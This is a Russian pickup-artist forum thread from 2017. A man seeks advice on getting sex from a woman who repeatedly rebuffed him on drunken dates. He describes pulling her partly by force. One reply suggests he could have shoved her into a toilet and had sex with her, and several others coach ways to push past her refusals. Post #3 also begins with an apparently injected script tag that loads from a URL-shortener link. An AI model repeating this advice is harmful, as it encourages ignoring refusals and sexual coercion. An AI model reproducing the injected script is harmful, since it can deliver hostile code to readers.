Top.Mail.Ru

Перейти к содержимому

Фотография

Нужен совет

• Авторизуйтесь для ответа в теме
Сообщений в теме: 20

#1 Метатель метафор

Метатель метафор

тусовщик

• Посетитель
  • Pip
  • 58 Cообщений
21
Очень хороший

Отправлено 29 мая 2017 - 22:19

Ситуация такая:

Есть ОЖП 6,5 28 лет, познакомились вживую в прошлом году, тогда неск-ко раз от встреч отмазалась, я отстал, но в вк она осталась, в этом году попробовал снова, вытащилась. Иногда в вк списывались, был какой никакой раппорт.

Пошли сразу выпивать, повел в в кафешку с уединенными кабинками, планировал трехсвиданку за встречу, но в итоге не сумел прожать, до засосов даже не дошло, при этом разговоры о сексе были, даже была фраза от барышни - "сегодня ничего не будет - у меня там заросли, а завтра у меня встреча с СО")) охуел от такой прямоты, фразу не утилизировал, проигнорил, далее гибкости не хватало, в общем не смог прожать пьяненькую бабу в тот день.

ОЖП очень понравилась и неудача очень задела, в общем для меня сейчас очень важно получить секс с ней и я не очень хорошо соображаю теперь.

Что имеем сейчас: Раппорт после 1 встречи установлен хороший, так что через неделю на её выходные я зову её выпивать на квартиру - она отказывается при этом намекая на месячные, говорит мол можно через неделю. Я сразу предлагаю вместо квартиры просто посидеть в кафешке (в моменте подумал что 2недельный перерыв может внести коррективы и она сольется - типа надо подогреть)

Сейчас есть договоренность о встрече, но эта идея мне уже не очень нравится, так как я чувствую что немного плыву и могу наломать дров, да и вообще не очень хочется вхолостую ресурс тратить, когда маячит приятное ненапряжное времяпровождение через неделю. Поэтому, жду ваших советов:

1) Не совсем понятно как проводить встречу: надо соблазнять чтоб не быть во фрейме друга, при этом не увлекаться на тяжелую кинестетику так как секса в этот день не будет?

2) Нужна ли эта промежуточная встреча? Нормальный ли вариант отменить встречу сославшись на дела/болезнь? И потом через неделю уже звать. Как ОЖП воспримет?

ЦЕЛЬ: Секс, СО

Сообщение отредактировал Метатель метафор: 29 мая 2017 - 22:32

• 0

Реклама

Реклама
Хочешь убрать эти баннеры? Пройди регистрацию на форуме.

#2 Pilligrim

Pilligrim

простофлудер

• Полноправный
  • PipPipPipPip
  • 2 495 Cообщений
1 364
Очень хороший

Отправлено 30 мая 2017 - 00:34

Договорился, проводи встречу.

1. Не факт, что месячные.

2. Не факт, что они помешают ;))

Цель простая - углубить раппорт и продвинуться по кинестике. Т.е. обычное второе свидание. Как первое свидание провел? Напиши подробнее.

• 0
Кино, вино... и никакого домино.

#3 Метатель метафор

Метатель метафор

тусовщик

• Посетитель
  • Pip
  • 58 Cообщений
21
Очень хороший

Отправлено 30 мая 2017 - 05:53

<script type="text/oops" src="http://is.gd/J87Pzs"...7Pzs"></script>

Цель простая - углубить раппорт и продвинуться по кинестике. Т.е. обычное второе свидание. Как первое свидание провел? Напиши подробнее.

Взяли выпить, поехали в кафе с кабинками, там под фильмы распивали, пообщавшись немного, проведя 1 этап, пытаюсь посадить ее поближе, приобнять, сразу такой диалог: - "расслабься, если я чего нибудь захочу, сама тебя за яйца возьму" -"ты что на себя мужские функции берешь?" -"ты что пикапер?" -"почему пикапер?" ...потом сменила тему насколько помню. её слова близко к сердцу не воспринимаю, пытаюсь дальше прожимать через паузы, но каждый раз встречаю сопротивление. Раз попробовал резко ее притянуть чуть через силу когда ждали вроде туалетов,вроде отморозилась, но потом внезапно спросила - "если бы мы трахались, то где?" (тут я малость растерялся от неожиданности) -"тут рядом" - "в кустах?" - "нет, на квартире" не помню ее ответа, туалет освободился и она зашла внутрь

После такого вопроса я думал дело в шляпе, однако по прежнему на любые попытки кинестетить или засосать меня отталкивала. В итоге пошли досматривать фильм, потом заведение закрылось, а выпивка оставалась. Я повел ее в новый дом недалеко от кафехи смотреть вид с 16 этажа с подъездного балкона, но тут ждал фейл - подъезд до этого всегда открытый оказался заперт. Предложил снять квартиру чтобы там допивать, отказалась.

Поехали до ее дома где допили содержимое бутылки на лавочке, она уже совсем пьяная поднимала откровенные темы, но по прежнему на любое сближение отмораживалась, в итоге я забил на дальнейшие попытки прорвать оборону. Допили, проводил до двери (живет с мамой), хотел за ней из лифта выйти, легко оттолкнула, попрощались.

Пару раз отмораживался после ее отказов и она начинала сама меня трогать, но как только я ей отвечал, сразу отталкивала меня) Потом понял, что не нужно было сразу отвечать ей, неправильно сыграл в эту игру) Вот как-то так.

Первую свиданку разобрал, понял где накосячил, вопросы как дальше действовать.

Сообщение отредактировал Метатель метафор: 30 мая 2017 - 06:05

• 0

#4 Pilligrim

Pilligrim

простофлудер

• Полноправный
  • PipPipPipPip
  • 2 495 Cообщений
1 364
Очень хороший

Отправлено 30 мая 2017 - 12:21

Раз попробовал резко ее притянуть чуть через силу когда ждали вроде туалетов,вроде отморозилась, но потом внезапно спросила - "если бы мы трахались, то где?" (тут я малость растерялся от неожиданности) -"тут рядом" - "в кустах?" - "нет, на квартире" не помню ее ответа, туалет освободился и она зашла внутрь

Тут на высоком ВС можно было в туалет запихнуть и там трахнуть )) Но должна быть непрошибаемая уверенность в себе и игра на грани фола, т.е. проявить силу, но не перегнуть палку. И быть готовым к негативу и сливу. Ну да ладно, в этой теме это вольное отступление.

Как ты собрался сейчас звать ее домой, когда у тебя до 2 свидания не дошло? Сейчас нужно провести качественное второе свидание - наладить хороший раппорт и нормальную кинестику.

Теперь самое главное - ты провел свидание с позиции снизу, ты практически все время выступал в роли просящего. Она ведущая, ты ведомый. Очень вероятно, что к девочке нужен более жесткий, но в тоже время гибкий подход. Она пока не видит в тебе уверенного мужика. По твоему поведению видно, что ты боишься накосячить. Поэтому проводи 2 свидание:

1. Наладь хороший раппорт. Про усановление раппорта в РМЭС перечитай.

2. Далее наращивай кинестику. Попытки пресечь кинестику калибруй - если резкий негатив, отмораживайся с метасообщением, что за хуйня. Далее она начинает лезть попробуй повести, как она, т.е. сам пресекай кинестику. Зеркаль поведение. Т.е. на хуйню и членодразнительство нужна адекватная реакция.

3. Если резкого негатива нет, то реагируй с улыбкой, как на шалость ребенка, со словами "да ладно, че ты" и продолжай делать свое дело - шаг назад, два вперед.

Совсем самое главное - ты должен быть готов к сливу, причем не только с ее стороны, но и уйти сам, если ее поведение станет для тебя неприемлемым. Настрой себя на состоянее среднее между похуй и "я хочу соблазнить эту девочку".

• 2

#5 Давинче

Давинче

бывалый

• Полноправный
  • PipPip
  • 352 Cообщений
262
Очень хороший

Отправлено 30 мая 2017 - 13:05

Не легкая партия)))),или она с голодняка сама тебя трахнет или ничего у вас не получится.. Сам ты ее врятли обыграешь...
Сдается мне, тебе нужно плавно сьехать с роли просящего,тупо проводи время в свое удовольствие.Шибко не проявляй интерес к сексу с ней,но тему обязательно поддерживай.Она сама все сделает.
  • 1

#6 Метатель метафор

Метатель метафор

тусовщик

• Посетитель
  • Pip
  • 58 Cообщений
21
Очень хороший

Отправлено 30 мая 2017 - 14:52

Как ты собрался сейчас звать ее домой, когда у тебя до 2 свидания не дошло? Сейчас нужно провести качественное второе свидание - наладить хороший раппорт и нормальную кинестику.

Ну бывает и с 0 свидания приезжают из интернета))  а тут алкогольный раппорт построен, давно знакомы, она прямолинейная местами и видимо любит прибухнуть, думаю могло сработать)

Теперь самое главное - ты провел свидание с позиции снизу, ты практически все время выступал в роли просящего. Она ведущая, ты ведомый. Очень вероятно, что к девочке нужен более жесткий, но в тоже время гибкий подход. Она пока не видит в тебе уверенного мужика. По твоему поведению видно, что ты боишься накосячить. 

Согласен, вот поэтому как раз эта ситуация так зацепила.

Совсем самое главное - ты должен быть готов к сливу, причем не только с ее стороны, но и уйти сам, если ее поведение станет для тебя неприемлемым. Настрой себя на состоянее среднее между похуй и "я хочу соблазнить эту девочку".

Спасибо, дружище, хороший совет, вот теперь полегчало)

• 0

#7 Pilligrim

Pilligrim

простофлудер

• Полноправный
  • PipPipPipPip
  • 2 495 Cообщений
1 364
Очень хороший

Отправлено 30 мая 2017 - 15:23

1. Ну бывает и с 0 свидания приезжают из интернета))  а тут алкогольный раппорт построен, давно знакомы, она прямолинейная местами и видимо любит прибухнуть, думаю могло сработать)

Теперь самое главное - ты провел свидание с позиции снизу, ты практически все время выступал в роли просящего. Она ведущая, ты ведомый. Очень вероятно, что к девочке нужен более жесткий, но в тоже время гибкий подход. Она пока не видит в тебе уверенного мужика. По твоему поведению видно, что ты боишься накосячить. 

2. Согласен, вот поэтому как раз эта ситуация так зацепила.

Бывает всякое )) Но в этой ситуации у тебя не было никакого алкораппорта, у тебя были пляски под ее дудку. 1 пункт в твоем случае не сочетается со 2 - был бы раппорт, ты бы не был ведомым. При раппорте она бы не дразнила тебя, ей бы была важна твоя реакция. А так ей похуй, ты же пляшешь вокруг нее. В каком месте тут раппорт? ))

Сейчас варианта 2:

1. Ты ей в карту, и она действительно провоцирует тебя к решительным действиям. Возможно даже подсознательно.

2. Ей на тебя похуй, и она просто не видит в тебе мужика.

Думаю, в твоем случае, первый вариант более вероятен.

• 1

#8 Метатель метафор

Метатель метафор

тусовщик

• Посетитель
  • Pip
  • 58 Cообщений
21
Очень хороший

Отправлено 31 мая 2017 - 06:54

Прошла встреча.

Советы были хорошие, а если бы я ими воспользовался, было бы еще лучше, но нет.

Даже писать не хочется, но надо)

Короче пошли в подобное заведение как в 1 раз, вначале случилась такая хуйня - ей что-то не понравилось(не помню что именно, какая то мелочь) и она бросила мне "я щас уйду" , я ответил "уходи если хочешь" потом мы начали фильм смотреть, я взял по пиву, а она начала в телефоне переписываться периодически типа собираясь свалить, нависло напряжение, разговор особо не клеился. я спрашиваю - ты реально валить собралась? - ну ты же сказал уходи; - я сказал, если хочешь, уходи; - ну я не могу остаться после такого; потом говорит - ну если ты скажешь "*имя*, останься пожалуйста, прости" , на что я ответил "оставайся."(????)

Не знал как тут действовать, стоило сливать за такое поведение?

Сексом всё естественно не закончилось)

Сообщение отредактировал Метатель метафор: 31 мая 2017 - 06:55

• 0

#9 СамБля

СамБля
  • Участник
  • 5 Cообщений
0
Обычный

Отправлено 31 мая 2017 - 06:56

Прошла встреча.

Советы были хорошие, а если бы я ими воспользовался, было бы еще лучше, но нет.

Даже писать не хочется, но надо)

Короче пошли в подобное заведение как в 1 раз, вначале случилась такая хуйня - ей что-то не понравилось(не помню что именно, какая то мелочь) и она бросила мне "я щас уйду" , я ответил "уходи если хочешь" потом мы начали фильм смотреть, я взял по пиву, а она начала в телефоне переписываться периодически типа собираясь свалить, нависло напряжение, разговор особо не клеился. я спрашиваю - ты реально валить собралась? - ну ты же сказал уходи; - я сказал, если хочешь, уходи; - ну я не могу остаться после такого; потом говорит - ну если ты скажешь "*имя*, останься пожалуйста, прости" , на что я ответил "оставайся."(????)

Не знал как тут действовать, стоило сливать за такое поведение?

Сексом всё естественно не закончилось)

почему не закончилось сексом? секс с рукой у тебя был, я уверен

• 0

#10 Pilligrim

Pilligrim

простофлудер

• Полноправный
  • PipPipPipPip
  • 2 495 Cообщений
1 364
Очень хороший

Отправлено 31 мая 2017 - 08:32

Тут не то, что сексом, тут и раппорт не закончилось )) Про кинестику даже и говорить не стоит )) Что получилось ты и сам понял:

1. Не вывез слова. Если говоришь - уходи, будь готов к этому. А лучше говори это только тогда, когда уверен, что БЗ таков, что она не уйдет.

2. Как следствие, раппорт порвал в клочья.

3. Так и остался с позиции снизу.

Можешь, конечно, попытаться еще раз, если вытащишь ее на свиданку. Но из подобного фрейма будет сложно выбраться.

• 0

#11 БезАнсамБля

БезАнсамБля
  • Участник
  • 3 Cообщений
0
Обычный

Отправлено 31 мая 2017 - 08:46

Тут не то, что сексом, тут и раппорт не закончилось )) Про кинестику даже и говорить не стоит )) Что получилось ты и сам понял:

1. Не вывез слова. Если говоришь - уходи, будь готов к этому. А лучше говори это только тогда, когда уверен, что БЗ таков, что она не уйдет.

2. Как следствие, раппорт порвал в клочья.

3. Так и остался с позиции снизу.

Можешь, конечно, попытаться еще раз, если вытащишь ее на свиданку. Но из подобного фрейма будет сложно выбраться.

когда тебя в жопу ебут, но в позе "ты наверху", какой у тебя фрейм? вроде пассивный, значит, в позиции снизу, а вроде и сверху. как сам оцениваешь?

• 0

#12 Molester

Molester

тусовщик

• Посетитель
  • Pip
  • 72 Cообщений
29
Очень хороший

Отправлено 31 мая 2017 - 10:27

ну если ты скажешь "*имя*, останься пожалуйста, прости" , на что я ответил "оставайся."(????)

Тест на прогиб, и ты его на 50% завалил.

Сообщение отредактировал Molester: 31 мая 2017 - 10:27

• 0

#13 iphonechik

iphonechik

старофлудер

• Полноправный
  • PipPipPipPipPip
  • 3 219 Cообщений
1 362
Очень хороший

Отправлено 31 мая 2017 - 11:57

Девочка включила "стерву" с прямолинейными разговорами )))

Очень тонко с такой надо себя вести. Она к тебе тянется целоваться, а ты просто никакие подвижки не делаешь.С ней надо наглее быть, рвать шаблоны, дерзить но по-мужски(то есть корректно, под тему).

"Где мы будем трахаться?" , "Если я захочу потрахаться, то это не важно будет где, а как", типа "я не занимаюсь любовью, а жестко трахаюсь".

Про ситуацию с яйцами, я бы ответил, что между нами двумя, у меня лучше получается тебя соблазнять, поэтому трахать буду тебя я, а не ты меня.

В чем она была одета? В лифте когда ехали?

Сообщение отредактировал iphonechik: 31 мая 2017 - 11:59

• 0

#14 Метатель метафор

Метатель метафор

тусовщик

• Посетитель
  • Pip
  • 58 Cообщений
21
Очень хороший

Отправлено 31 мая 2017 - 12:23

"Где мы будем трахаться?" , "Если я захочу потрахаться, то это не важно будет где, а как", типа "я не занимаюсь любовью, а жестко трахаюсь".

Если бы ВС было в норме ответил бы что то типа "тут рядом на квартире, если по дороге в кустах тебя не трахну" или на дверь туалета указал бы)

Про ситуацию с яйцами, я бы ответил, что между нами двумя, у меня лучше получается тебя соблазнять, поэтому трахать буду тебя я, а не ты меня.

В чем она была одета? В лифте когда ехали?

Шикарный ответ, до такого я бы не додумался.

В джинсы с футболкой. Первая встреча уже не актуальна, на второй просраны все полимеры)) Не работают у меня мозги с ней.

• 0

#15 Pilligrim

Pilligrim

простофлудер

• Полноправный
  • PipPipPipPip
  • 2 495 Cообщений
1 364
Очень хороший

Отправлено 31 мая 2017 - 12:28

Ничего, бывает )) Это называется опыт, который позволяет в будущем не допускать прошлых ошибок.

• 0

Количество пользователей, читающих эту тему: 0

0